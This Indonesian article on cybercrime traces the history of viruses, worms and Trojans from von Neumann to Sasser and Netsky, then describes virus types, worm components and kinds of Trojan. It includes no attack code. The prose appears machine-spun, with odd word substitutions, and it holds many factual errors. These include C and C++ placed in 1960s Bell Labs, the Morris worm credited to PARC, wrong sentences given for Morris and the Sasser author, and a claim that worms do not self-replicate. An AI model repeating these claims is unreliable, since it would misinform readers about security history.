Kejahatan pada dunia komputer  jaringan Internet seperti serangan virus, worm, Trojan, Denial of Service (DoS), Web deface, pembajakan software, sampai  pencurian kartu kredit semakin   menjamur,.kejahatan  dunia komputer  meningkat sejalan dengan perkembangan  teknologi pada bidang ini.  ini sebetulnya   sudah muncul sejak awal. Kemunculan teknologi komputer hanya bersifat netral. kejahatan komputer melalui jaringan internet  dinamakan   Cybercrime. Pada tahun 1949, John von Newman, yang menciptakan Electronic Discrete Variable Automatic Computer (EDVAC), menjelaskan   transkripnya  yang berjudul Theory and Organization of Complicated Automata. Dalam transkripnya  dibahas kemungkinan program yang dapat menyebar dengan sendirinya.
Tahun 1960, para ahli di lab BELL (AT&T)  labolatorium terbesar di dunia yang   menghasilkan produk  dunia komputer-  menerapkan  teori  john v neuman. Mereka bermain-main dengan teori itu  untuk suatu jenis game. , para peneliti memicu  permainan dengan suatu program yang dapat memusnahkan program buatan lawan, kemampuan membenahi dirinya sendiri lalu balik menyerang kedudukan lawan. Program permainan ini juga dapat memperbanyak dirinya secara otomatis. Perang program ini dinamakan  Core War, pemenangnya adalah pemilik program sisa terbanyak dalam selang waktu tertentu. sebab  sadar akan bahaya program itu  bila sampai bisa bocor keluar laboratorium (terutama sekali sebab  C dan C++ adalah salah satu pemrograman bahasa tingkat tinggi pembuat virus saat itu  terlalu  mudah dipelajari yang sangat berbahaya), maka setiap selesai permainan, bahasa program dan virus  itu wajib  selalu dimusnahkan,
Tahun 1970, perusahaan Xerox memperkenalkan suatu bahasa program yang dipakai  untuk membantu  kelancaran  kerja.  Struktur  programnya  mirip   virus,  namun  program  ini adalah untuk memanfaatkan waktu semaksimal mungkin dan pada waktu yang bersamaan dua tugas dapat dilakukan.
1980, bahasa Program C  berbahaya dan  rahasia  yang tadinya dipakai  hanya sekedar sebagai permainan berbahaya itu  akhirnya keluar dari lab, menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber. Perang virus di dunia dimulai secara besar besaran  bermula atas pemaparan Fred Cohen, seorang peneliti dan asisten profesor di Universitas Cincinati, Ohio. Dalam pemaparannya, Fred juga mendemonstrasikan  sebuah  program  ciptaannya,  yaitu  suatu  virus  yang  dapat  menyebar secara cepat pada sejumlah komputer.
1981, Sebuah Virus yang bernama sama dengan pembuatnya, Elk Cloner, lahir di di TEXAS A&M. Menyebar melalui disket Apple II yang memiliki operating system. Sang perusak ini mendisplay pesan di layar : "It will get on all your disks-It will infiltrate your chipsyes it is Cloner!-It will stick to you like glue-It will modify RAM too-send in the Cloner!"
3 Nopember 1983, Len Adleman meresmikan nama VIRUS dalam sebuah seminar yang membahas cara memicu  virus dan memproteksi diri dari virus.
1986, Virus Brain (dikenal dengan nama virus Pakistan) menyebarluas  tidak terkendali  di dunia , yaitu  Virus paling canggih yang  menggemparkan seluruh dunia dikala itu. sebab  penyebarannya yang luar-biasa itulah tahun ini justru dinamakan  sebagai awal munculnya jutaan  virus penyempurna  . Kelahiran virus ini  bersamaan dengan [PC-Write Trojan] dan [Vindent].
Tahun 1988, muncul serangan besar-besaran  terhadap  Machintosh dari  virus [MacMag] & [scores]. Di tahun ini juga  jaringan Internet dihajar habis-habisan oleh worm buatan Robert Morris, Jr, seorang mahasiswa Ilmu Komputer Cornell.Morris memicu  suatu percobaan  aplikasi yang dapat menggandakan diri secara otomatis dan menyebarluas dengan memanfaatkan kelemahan UNIX sendmail. jutaan situs dunia  hilang    dan menghasilkan kerugian hingga puluhan juta  dolar, suatu jumlah yang   besar dikala itu. Penyebarannya yang tak terkendali sebetulnya benar benar   bukan hal yang disengaja oleh Morris ,Akibat dari perbuatannya ini, tetap saja Morris memperoleh  hukuman 3 tahun penjara, 400 jam melakukan layanan masyarakat, denda $10.050, dan biaya-biaya tambahan lainnya.
Tahun 1989 ada komunitas  yang menyebarkan file "AIDS information program" dan celakanya, begitu file ini dibuka, yang didapat bukannya info tentang AIDS, tapi virus yang mengenkripsi harddisk dan meminta bayaran untuk kode pembukanya,
Tahun 1990 Bulgarian virus exchange factory (VX) komunitas BBS didirikan. Tips-trik pembuatan virus  computer  disebarkan  melalui  BBS  ini.  Mark  Ludwig  menulis  sebuah  buku  yang berjudul  The  Little  Black  Book  of  Computer  Viruses.  Dalam  buku  itu   dibahas tahap pembuatan virus .
Tahun 1991, virus polymorphic pertama lahir. Virus yang diberi nama Tequila ini datang dari Switzerland.
Tahun 1992, muncul virus mematikan yang sempat memicu  panik para pemakai  komputer. Virus itu  diberi nama Michelangelo. Namun penyebaran virus ini kurang begitu meluas,
Di tahun ini lahir dua buah toolkit : Dark Avenger Mutation Engine (DAME) dan Virus Creation Laboratory (VCL). Toolkit itu  membantu user untuk memicu  virus computer dengan cara instant.
Tahun 1995 muncul serangan besar-besaran, semua komputer  instansi Perusahaan-perusahaan besar dilumpuhkan, diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak perusahaan raksasa lain yang diperdaya oleh virus "the inetrnet liberation front" di hari  thanksgiving . sebab  keberanian dan kedahsyatan serangan itu, tahun 1995 dijuluki sebagai tahunnya para Hacker dan Cracker. Di tahun ini juga lahir Concept, virus macro pertama yang menyerang transkrip  Microsoft Word.
1996, Boza, virus pertama yang ditujukan khusus untuk Windows 95 terlahir. Muncul juga Laroux, virus pertama yang menginfeksi MS Excel. Tahun ini juga yaitu  Staog, Virus pertama yang menginfeksi Linux.
1998, Lahir Strange Brew, yaitu  Virus Java pertama. Lahir juga Back Orifice, Trojan pertama yang menyebarluas, memungkinkan user tidak sah untuk mengendalikan komputer lain melalui internet.
1999, Kombinasi virus&worm dengan nama yang sangat manis terlahir: Melissa. Melissa yaitu  perpaduan virus macro dan worm yang menyebarluas melalui email dengan memanfaatkan kelemahan Outlook. Muncul juga Corner, virus pertama yang menginfeksi MS Project files.
Ada juga Tristate, multi-program macro virus pertama yang menginfeksi file-file Word, Excel, dan PowerPoint. Bubbleboy, concept worm pertama yang otomatis berjalan saat  email Outlook terbuka.
Tahun 2000, sesudah  sekian lama tidak ada serangan yang terlalu menggemparkan, dunia dikejutkan dengan  serangan besar-besaran.  Denial of Service (DoS) yang melumpuhkan Yahoo, Amazon dan situs-situs raksasa lainnya yang diakibatkan oleh worm. Worm bernama Love Letter melumpuhkan e-mail systems di penjuru dunia.Worm Timofonica mengacaukan jaringan telepon Spanyol. Liberty, worm pertama yang menyerang PDA terlahir. Pirus, dari keluarga virus concept menginfeksi file-file HTML and PHP.
Tahun 2001, kembali dunia harus menghadapi  serangan worm. Gnuman (Mandragore)  terlahir.  Worm  ini  menyamar  sebagai  file  MP3.  Winux,  worm  yang menyerang mesin Windows dan LINUX, hadir dari Czech Republic. LogoLogic-A menyebar melalui percakapan yang dilakukan memakai  MIRC chat dan menyebar via e-mail. AppleScript worm memanfaatkan kelemahan Outlook Express (Windows) dan Entourage (Macintosh),  menyebar  melalui  email  dengan  target  nama-nama  yang  tersimpan  dalam address book. PeachyPDF worm, worm pertama yang menyebar memakai  software Adobe. Lahir juga  worm-worm raksasa: Nimda, Sircam, CodeRed, BadTrans yang melumpuhkan  jaringan komputer dunia.Dalam  sejarah  perkembangan  WORM,  CODE  RED  ialah  Worm  Internet  yang  paling populer. 
  pada 18 Juni 2001. komunitas Hacker dunia menyebarluaskan info bugs tentang remote Buffer Overflow pada Microsoft Internet Information Server (IIS). Jika kelemahan itu  diexploitasi secara tepat, attacker akan memperoleh  akses setara Administrator pada mesin target. Kelemahan itu  muncul dari filter ISAPI yang memiliki  request dari Microsoft Index Server. Server itu  secara khusus menangani request dengan cara mengirimkan request GET dalam form khusus berekstensi .ida,
Namun para ahli keamanan  meremehkan hal itu  disebab kan sangat sedikitnya serangan yang terjadi. Dikala itu, mereka memicu  suatu pemikiran yang sangat keliru: tidak ada serangan, maka tidak ada ancaman”. sebuah pemikiran yang  ironis  sebab   datang  dari  sejumlah  besar  kalangan  yang  mengerti  benar  tentang  system. Hingga akhirnya muncul serangan besar-besaran yang melumpuhkan ratusan ribu situs dan memicu  kerugian yang sangat besar.. .. code red terlahir mengexploitasi kelemahan yang diremehkan itu,Dunia keamanan   terguncang akan serangan ini. Para ahli keamanan  segera berlomba-lomba untuk memecahkan masalah yang sebetulnya  sudah terlahir 8 bulan silam..Serangan   ini   tidak   hanya   behenti   sampai   disitu,   varian-varian   baru   segera   terlahir, bermunculan worm-worm baru yang lebih ganas dari Code RED: NIMDA. Kerugian yang diderita dunia semakin besar dan semakin banyak korban berjatuhan.. 
Tahun 2002, LFM-926, lahir virus pertama yang menginfeksi file Shockwave Flash (.SWF). menambah nambah    pesan  saat  file  itu   jalankan:  "Loading.Flash.Movie..    Donut  terlahir untuk menyerang .NET services. Sharp-A, worm pertama yang ditulis dengan C# untuk menyerang .NET. Hal yang menarik disini adalah sebab  pembuatnya seorang wanita, hal yang jarang terjadi dalam dunia worm & pervirusan di masa itu *_*. SQLSpider worm menyerang Microsoft SQL Server. Benjamin memanfaatkan KaZaa peer-to-peer network untuk menyebarluas. pesan  virus, menyertakan dirinya pada file .JPEG. Scalper worm menyerang FreeBSD/Apache Web servers, menjadikan korbannya sebagai computer Zombie. Klez.H dari jenis stealth virus terlahir. Menyebar dengan memanfaatkan kelemahan Windows yang mengizinkan pemakaian  double extension. Virus ini yaitu  virus yang paling berkuasa di tahun 2002. Dilaporkan Sophos (sebuah perusahaan Antivirus) bahwasanya dari komputer-komputer yang terinfeksi virus ternyata 25% terinfeksi oleh Klez. Selain itu, I- Worm.Cervinec, I-Worm.MyLife.b, Zircon C, menyebar dalam skala besar melalui email.
Tahun  2003,  Worm  Blaster  mengexploitasi  kelemahan  RPC  DCOM  pada  Windows. Kembali dunia menghadapi serangan besar-besaran. Sobig-F dicatat sebagai virus yang paling sukses menyebar. Selai itu ada juga  Slammer yang menyerang mesin-mesin database yang memakai  perangkat lunak SQL Server 2000 dari Microsoft. Worm ini memicu  jaringan internet melalui Asia, Eropa, dan Amerika mati. Serangan virus di Korea Selatan yaitu  yang terparah, sebab  negara ini memiliki penetrasi layanan pita lebar internet tertinggi di dunia atau 100 kali lebih cepat dibandingkan dengan model dial-up.
Mei  2004,  jaringan  internet  dunia  dikacaukan  oleh  worm  SASSER.  Banyak  jaringan komputer bandara-bandara Internasional mati total. Pelabuhan-pelabuhan dunia memakai  sistem manual sebab  jaringan komputer mereka tidak berfungsi. Ribuan perusahaan raksasa harus menderita kerugian ratusan ribu hingga jutaan dolar. Sasser mengeksploitasi celah sekuriti yang ada  pada Microsoft Windows yang dikenal sebagai LSASS untuk melumpuhkan system.
Pelaku  pembuat  worm  Sasser  ini  adalah  pelajar  SMU  berusia  18  tahun  berkebangsaan Jerman. Pihak kepolisian Jerman menangkapnya di sebelah utara kawasan Waffensen, tempat dimana dia tinggal bersama keluarganya. Akibat dari perbuatannya, tersangka memperoleh  hukuman 5 Tahun penjara.
Di tahun yang sama, worm internet bernama "Bagle" atau "Beagle" menyebar dengan cepat di Asia, Afrika, dan Eropa. Bagle akan memberitahu penciptanya mengenai korban-korban baru yang didapatkannya, lalu ia akan mencoba membuka sebuah pintu belakang yang dapat dipakai Hacker untuk mengambil alih kendali komputer. Bagle mampu  untuk melumpuhkan  program  antivirus  dan  sekuriti  seperti  Kaspersky  Antivirus,  Mc  Afee, Symantec dan ZoneAlarm dengan teknik penghapusan key registry aplikasi-aplikasi itu .
Di tahun itu muncul worm baru bernama NETSKY. Aksi yang dilakukan NETSKY tidak banyak berbeda dengan Bagle. Kedua pembuat worm ini akhirnya saling berperang dengan saling melontarkan caci-maki antara keduanya melalui worm yang mereka buat. NETSKY akhirnya dinyatakan lebih unggul dibandingkan  Bagle sebab  penyebarannya yang sangat luas.
Tahun 2005-2007 varian-varian baru Bagle menyebarluas, namun kemudian meredup sebab  pembuatnya tertangkap. Penyebaran NETSKY juga mengalami peningkatan sesaat dan hanya lahir sedikit varian-varian baru. Di tahun-tahun ini tidak begitu banyak Virus & Worm baru yang   menggemparkan di kalangan dunia seperti para pendahulunya kecuali serangan- serangan virus lokal.
Tahun 2005 ini tampaknya para Underground Programmer dunia memfokuskan diri pada SPYWARE.  Mengapa  spyware?  Kemungkinan  besar  ialah  sebab   Microsoft  memang sedang gencar-gencarnya melakukan penangkapan  pada  para penulis Virus & Worm. Hadiah yang ditawarkan oleh Microsoft memang   menggiurkan, ini lah yang memicu  banyak para penulis Virus dunia yang tertangkap dan memicu  gentar para penulis worm baru yang ingin memanfaatkan kelemahan system secara besar-besaran.Alasan lain mengapa Spyware mendominasi malware di tahun-tahun ini ialah sebab  banyaknya success story pembuat Spyware dan besarnya uang yang berputar dalam bisnis Spyware. Jika anda memicu  virus yang berhasil menginfeksi banyak komputer seperti Sven Jaschan (pembuat Netsky) dan tertangkap anda akan memperoleh  dua hal: pertama menjadi terkenal dan yang kedua masuk penjara. Sebaliknya jika anda memicu  Spyware yang berhasil menginfeksi banyak komputer maka anda akan memperoleh  uang banyak dan tidak tersentuh oleh hukum sebab  pemilik komputer korban Spyware sudah menyetujui komputernya dimasuki Spyware. Pembuat Spyware membayar pemilik Freeware untuk memasukkan iklannya dalam freeware itu  dan mereka dilindungi oleh perjanjian EULA (End User License Agreement) yang harus disetujui terlebih dahulu oleh pemakai  Freeware dengan mengklik I Agree pada saat instalasi Freeware. EULA inilah yang memicu  pembuat spyware tidak dapat ditangkap.
Virus adalah suatu program yang aktif dan menyebar dengan merekayasa  program atau file lain. Virus tidak bisa aktif dengan sendirinya; melainkan perlu diaktipkan. Sekali diaktipkan, dia akan mereplikasi dirinya dan menyebar. Meskipun demikian sederhana,   virus ini sangat berbahaya sebab  dapat dengan cepat memakai  semua memori yang tersedia dan dapat berakibat mes in komputer tak bisa berjalan sebagaimana mestinya. Virus dibuat untuk menghapus semua  atau merusak file tertentu, yang dipancarkan biasanya melalui email, downolad file, media storage non permanen, alat penyimpan data dan sebagainya.
Virus pertama kali muncul pada tahun 1981di Texas dengan nama Elk Cloner. Virus ini menyebar melalui disket Apple II. Virus ini mendisplay pesan di layar. Isi pesan dari virus itu   antaralain :“It will get on all your disks-It will infiltrateyour chipsyes it is Cloner!-It will stick toyou like glue-It will modify RAM too-send in the Cloner!". Nama Virus itu sendiri baru diperkenalkan sesudah  2 tahun dari kemunculan Elk Cloner. Nama virus itu  diperkenalkan oleh Len Adleman pada November 1983 dalam sebuah seminar yang membahas tentang cara memicu  virus and memproteksi diri dari virus. Namun orang-orang   menganggap bahwa virus yang pertama kali muncul adalah virus Brain yang justru lahir tahun 1986. Wajar saja, orang-orang beranggapan seperti itu sebab  virus ini yang paling menggemparkan dan paling luas penyebarannya sebab  menjalar melalui disket DOS yang pada saat itu sedang pojuga r. Virus ini juga lahir bersamaan dengan PC-Write Trojan dan Vindent. Mulai saat itu, virus mulai merambat sangat luas dan perkembangannya sangat pesat. Berselang satu tahun muncul virus pertama yang menginfeksi file. Biasanya virus ini menyerang file yang berekstensi *.exe. Virus ini bernama Suriv . Virus ini termasuk dalam golongan virus jerussalem. Kecepatan penyebaran virus ini sangatlah pesat. Virus ini menyerang mainframe dari IBM   lama, yaitu sekitar 1 tahun.Pada tahun 1988, muncul virus yang menyerang Machintosh. Nama virus ini adalah Macmag dan Scores. Pada saat yang hampir bersamaan, muncul virus yang menyerang internet yang dibuat oleh Robert Morris. Sejak saat itu, penyebaran virus sudah melampaui batas, namun , dampak yang ditimbulkan tidak terlalu besar.
Pada tahun 1995, muncul virus yang menyerang perusahaan-perusahaan besar diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak lagi yang dilakukan oleh Internet Liberation Front di hari Thanksgiving. Oleh sebab  itu, tahun 1995 dijuluki sebagai tahunnya para hacker dan cracker.Cara Kerja virus  Menurut Jenisnya
Virus yaitu  suatu program computer yang mampu  untuk merusak file atau  merusak system komputer. Virus memiliki berbagai jenis dan memiliki  cara kerja yang berbeda-beda,Berikut Jenis jenis virus dan cara kerja masing-masing virus :
-Virus Siluman (stealth virus)
Virus ini memiliki  cara kerja yaitu dia mampu menyembunyikan dirinya dengan cara memicu  sebuah file yang terinfeksi seolah-olah file itu  tidak terinfeksi.
- Virus Makro
Virus ini memiliki  cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel. Biasanya transkrip  yang terinfeksi oleh Virus Makro akan merekayasa  perintah yang ada di Microsoft Office seperti perintah Save untuk menyebarkan dirinya saat perintah itu  dijalankan.
-Virus File
Virus ini memiliki  cara kerja yaitu menginfeksi aplikasi atau transkrip  yang ada dalam komputer anda.Saat aplikasi yang terinfeksi itu  dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau transkrip  yang diakses oleh aplikasi  itu .
-Virus Boot Sector
Virus ini memiliki  cara kerja yaitu menginfeksi boot sector harddisk (boot sector yaitu  sebuah area  dalam hardisk yang pertama kali diakses saat komputer dihidupkan). Jika virus boot sector ini aktif, pemakai  tidak akan bisa membooting komputernya secara normal.
- Virus E-mail
Virus ini memiliki  cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment). Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat. jika  Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang ada  dalam buku alamat pemakai .
-Virus Multipartite
Virus ini memiliki  cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk. Virus jenis ini akan menimbulkan banyak masalah sebab  memicu  kerusakan yang fatal.
- Virus Polimorfis
Virus ini memiliki  cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain. Virus jenis lebih sulit dideteksi sebab  memiliki  sifat seperti itu.
Worm adalah sebuah program computer yang dapat menggandakan dirinya secara sendiri dalam sistem komputer. Sebuah worm dapat menggandakan dirinya dengan memanfaatkan jaringan (LAN/WAN/Internet) tanpa perlu campur tangan dari user itu sendiri. Worm tidak seperti virus  biasa, yang menggandakan dirinya dengan cara menyisipkan program dirinya pada program yang ada dalam komputer itu , tapi worm memanfaatkan celah keamanaan yang memang terbuka atau lebih dikenal dengan sebutan vulnerability. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm yaitu  evolusi dari virus . Hanya ada satu cara untuk mengatasi worm yaitu dengan menutup celah keamanan yang terbuka itu , dengan cara meng-update patch atau Service Pack dari operating sistem yang dipakai  dengan patch atau Service Pack yang paling terbaru.
Worm serupa dengan virus, tetapi tidak sama sebagaimana virus, dia tidak mereplikasi dirinya. Worm memakai  jaringan yang terhubung. Worm dapat aktif dan menyebar dengan cepat dan tidak perlu memerlukan intervensi manusia atau diaktifkan. Sistem kerja Worm dapat memiliki  dampak jauh lebi h besar dibanding virus tunggal dan dapat menyebar dan menginfeksi bagian-bagian dari jaringan dengan cepat.
Sejarah Worm
Sejarah Worms mulai ada dan dikenal sejak awal internet mulai dipublikasikan. Dimana saat itu para ahli berusaha mengumpulkan informasi dari seluruh jaringan internet yang belum memiliki semacam mesin pencari (search engine). 
Untuk mengenal sejarah awal keberadaan worms, secara singkat dapat diketahui bahwa sejak awal penciptaan worms di Palo Alto Research Center (PARC) oleh Robert T. Morris, berdasar  lingkungan sistem operasinya worms berkembang dua kategori yaitu, worms yang berjalan dengan target sistem operasi UNIX dan Worms yang pada sistem operasi Microsoft Windows. Worms pada sistem UNIX dan variannya terdiri dari ADMW0rm, ADM Millenium, Ramen, li0n, Cheese, sadmind/IIS, dan Adore. sedang  worms yang berjalan pada sistem Microsoft Windows terdiri dari Code Red 1, Code Red 2, Code Red II, Nimda, SQL Snake dan Sapphire. Beberapa catatan tentang kronologis worms itu  antara lain : 
1. Morris worms
Worms ini diciptakan oleh Robert Tappan Morris pada tahun 1988 sebagai proyek riset pada saat menyelesaikan program doktoralnya di Cornell Unversity. Dengan memanfaatkan kelemahan (vulnerability) pada Sendmail Server dan Finger Daemon pada sistem Unix, worms ini menyebar dengan sesudah  memicu  keadaan zero argumenth pada sistem yang diinfeksinya. Teknik penyebaran worms ini, masih dipakai hingga saat ini. Efek penyebaran worms yang sangat luas ini, memicu  pembentukan tim Computer Emergency Response Team (CERT/CERT-CC) oleh Amerika. 
2. Ramen Worms 
yaitu  worms pertama yang berhasil menyebar pada lingkungan Linux. Ia pertama kali di identifikasikan menyerang Red Hat versi 6.1, 6.2, 6.3 dan 7.0., worms ini menyebar dengan bantuan shell scripts exploits dan scanner yang sudah  dikompilasi (packed) menjadi file binary. Sesudah  berhasil menginfeksi dan menjalankan aksinya (payload), ia kemudian mencari host lain secara acak pada jaringan kelas B. 
3. Sadmind/IIS 
Worms ini mampu menyerang web server IIS (Internet Information Service) Microsoft Windows, melalui kelemahan sistem pada Sun Solaris. Dengan mencari akses root pada Sun Solaris yang terhubung dengan sistem Unix, worms ini berevolusi dengan mengubah tampilan (deface)situs-situs yang memakai  IIS. 
4. Melissa
Worms ini bukan yang pertama kali memakai  teknik penyebaran melalui e-mail, tetapi kecepatan penyebaran yang hebat memicu  worms memicu  seluruh pemakai  internet/e-mail di dunia menjadi sangat menderita. Rahasia dibalik kesuksesan worms ini terletak pada implementasi rekayasa sosial pada 
5. Code Red (Code Red 1)
Begitu worms ini beraksi, ia langsung menjadi sebuah standar worms lain dalam melakukan infeksi. Teknik yang dipakai  adalah melakukan exploits pada lubang keamanan sistem yang baru diumumkan oleh vendornya. Waktu yang diperlukan  worms ini dalam usaha untuk mengeksploitasi lubang keamanan suatu sistem, melebihi kecepatan vendor dalam menyediakan patch untuk kelemahan sistem itu . 
6. Code Red II
Worms ini memakai  landasan ekploitasi pada pendahulunya yaitu Code Red 1 dan Code Red 2. Dengan Teknik Island hoping worms ini memicu  kecepatan penyebaranya meningkat tiga sampai empat kali lebih cepat dari versi pendahulunya. Teknik ini memicu  probabilitas serangan acak pada alamat Internet Protocol jaringan kelas A dan B menjadi lebih tinggi, sehingga lebih mudah dan cepat dalam menginfeksi sistem lain.
7. Nimda
Meskipun diidentifkasikan dibuat bukan oleh pembuat Code Red, worms ini kemungkinan memiliki tujuan untuk melanjutkan hasil serangan dari Code Red II. Dengan memakai  teknik yang sama dengan Code Red II, worms ini berbeda dalam proses scanning alamat IP pada jaringan. Dengan teknik itu  worms ini menyebakan aktivitas besar-besaran yang menguras sumber daya dalam jaringan.
Lima elemen  yang  dimiliki oleh worms adalah sebagai berikut, 
Reconnaissance.
elemen  Worms ini bertugas untuk merintis jalannya penyebaran pada jaringan. elemen  ini memastikan titik-titik (node) mana saja pada jaringan yang dapat dinfeksi olehnya.
Attack .
elemen  ini bertugas untuk melancarkan serangan pada target node yang sudah  teridentifikasi. Bentuk serangan dapat berupa tradisional buffer atau heap overflow, string format, dan sebagainya.
Communications
elemen  ini memicu  tiap node yang terinfeksi pada jaringan dapat saling berkomunikasi. elemen  memberi  semacam antar muka (interface) agar tiap worm pada jaringan dapat saling mengirim pesan. 
Command 
elemen  ini menjadi semacam pemicu jika  target sudah teridentifikasi. elemen  ini yaitu  suatu antar muka agar setiap worms dapat mengeluarkan perintah (command) pada worms di titik lain lain.
Intelligent 
elemen  ini yaitu  elemen  cerdas yang mampu memberi  informasi bagaimana sifat  keadaan worms di titik lain pada jaringan.  Berikut ini adalah bagaimana proses dari tiap elemen  itu  bekerjasama dalam melakukan suatu serangan.berdasar  media penyebarannya worms,  digolongkan menjadi, Email Worms  Instant Messaging Worm Internet Relay Chat (IRC) Worms  File Sharing Networks Worms  Internet Worms
 aktivitasi pola penyebaran worms dapat diketahui dengan beberapa cara, antara lain : 
Prediksi pola penyebaran Kekacauan yang ditimbulkan pada Backbone Internet  Beberapa indikator untuk mengetahui prediksi pertumbuhan worms dapat dilakukan dengan mengevaluasi elemen -elemen  pada Backbone Internet, elemen  itu  adalah,:
Data yang dilalukan pada router (data routing) 
 Alamat-alamat multicast pada backbone
 Kondisi pada infrastruktur server yang diserang 
Hasil observasi  Prediksi pertumbuhan worms dapat juga diketahui dengan melakukan observasi pada data aktual dari lalulintas jaringan. Untuk tujuan itu  ada  tiga kategori elemen , yaitu : 
melalui jaringan besar dari sistem yang diserang
melauli black hole monitor melalui individual host 
Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password, kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan target (memperoleh hak akses pada target).
Trojan di dalam sistem komputer adalah suatu program yang tidak diharapkan dan disisipkan tanpa sepengetahuan pemilik komputer. Program ini kemudian dapat diaktifkan dan dikendalikan dari jarak jauh, atau dengan memakai  timer (pewaktu). Akibatnya, komputer yang disisipi Trojan Horse itu  dapat dikendalikan dari jarak jauh. Definisi lain mengatakan bahwa Trojan adalah program apapun yang dipakai  untuk melaksanakan suatu fungsi penting dan diharapkan oleh pemakai, namun kode dan fungsi di dalamnya tidak dikenal oleh pemakai. lalu  program melaksanakan fungsi tak dikenal dan dikendalikan dari jarak jauh yang tidak dikehendaki oleh pemakai.
Sejarah Trojan Horse
Istilah Trojan Horse diambil dari legenda Yunani Kuno yaitu kisah Trojan War atau Perang Troya/Troy. Alkisah Putra Mahkota Kerajaan Troya yang bernama Paris terlibat perselingkuhan dengan Helen istri pejabat di Yunani. Hal itu memicu  pihak kerajaan Yunani marah dan menyerang kerajaan Troya. Namun benteng pertahanan Troya kuat sekali dikepung 10 tahun tidak juga menyerah. Pasukan Yunani yang sudah putus asa akhirnya memakai  taktik licik, mereka pura-pura meninggalkan kota Troya dan bersembunyi di balik bukit, namun mereka meninggalkan patung kuda besar dari kayu yang diisi dengan pasukan elit Yunani. Penduduk Troya bersukaria mengetahui pasukan Yunani sudah mundur, dan patung kuda yang bagus peninggalan pasukan Yunani itu diarak masuk kota Troya. Pada malam hari saat penduduk dan pasukan Troya terlelap maka pasukan elit di dalam patung kuda troya keluar, sebagian membukakan gerbang untuk pasukan Yunani yang bersembunyi di luar gerbang, sebagian menyerang obyek-obyek vital kerajaan Troya. Maka hancurlah kerajaan Troya. sebab  ada virus  memiliki  karakter yang mirip kisah Kuda Troya/ Trojan Horse maka beberapa virus itu  digolongkan menjadi 
Virus Trojan adalah program yang terdiri dari 2 bagian yaitu: program yang disusupkan ke komputer korban dengan segala tipu daya, dan yang satunya program yang dijalankan komputer hacker. Jika hacker berhasil menyusupkan program ke komputer korban, maka hacker bisa mengintai dan mengendalikan (me-remote) aktivitas komputer korban dari komputer hacker. 
Virus Trojan sangat berbahaya bagi pemakai  komputer yang tersambung jaringan komputer atau internet, sebab  bisa jadi hacker bisa mencuri data-data sensitif contohnya  password email, internet banking, paypal, e-gold,kartu kredit dan lain-lain. Jika anda   melakukan aktifitas keuangan online maka harus dipastikan bahwa komputer anda aman bebas dari virus. Untuk mencegah dan menghapus semua  virus Trojan pastikan anda memasang antivirus yang selalu ter-update, mengaktifkan Firewall baik bawaan dari Windows atau dari luar juga mengurangi resiko komputer kita diintai atau dikendalikan dari komputer lain. Selalu waspadalah jika komputer anda mengalami sesuatu kejanggalan, seandainya antivirus tidak mampu menanggulangi virus, format saja komputer dan install ulang sistem operasi dan sofware-sofwarenya. Hindari pemakaian  sofware ilegal/bajakan sebab    tanpa kita sadari software itu disusupi virus Trojan.
Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus  atau worm sebab  dua hal berikut:
Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan  kali berbentuk seolah-olah program itu  yaitu  program baik-baik, sementara virus  atau worm bertindak lebih agresif dengan merusak sistem atau memicu  sistem menjadi crash.
Trojan dikendalikan dari komputer lain (komputer attacker).pemakaian  istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Sparta bersembunyi di dalam Kuda Troya  yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya itu  menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak.
Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang   dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pemakai  (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem saat  pemakai  mengunduh aplikasi ( nya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi itu  dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.
Jenis-jenis Trojan Horse Beberapa jenis Trojan Horse yang beredar antara lain adalah:
Pencuri password: Jenis Trojan ini dapat mencari password yang disimpan di dalam sistem operasi (/etc/passwd atau /etc/shadow dalam keluarga sistem operasi UNIX atau berkas keamanan  Account Manager (SAM) dalam keluarga sistem operasi Windows NT) dan akan mengirimkannya kepada si penyerang yang asli. Selain itu, jenis Trojan ini juga dapat menipu pemakai  dengan memicu  tampilan seolah-olah dirinya adalah layar login (/sbin/login dalam sistem operasi UNIX atau Winlogon.exe dalam sistem operasi Windows NT) dan  menunggu pemakai  untuk memasukkan passwordnya dan mengirimkannya kepada penyerang. Contoh dari jenis ini adalah Passfilt Trojan yang bertindak seolah-olah dirinya adalah berkas Passfilt.dll yang aslinya dipakai  untuk menambah nambah  keamanan password dalam sistem operasi Windows NT, tapi disalahpakai  menjadi sebuah program pencuri password.
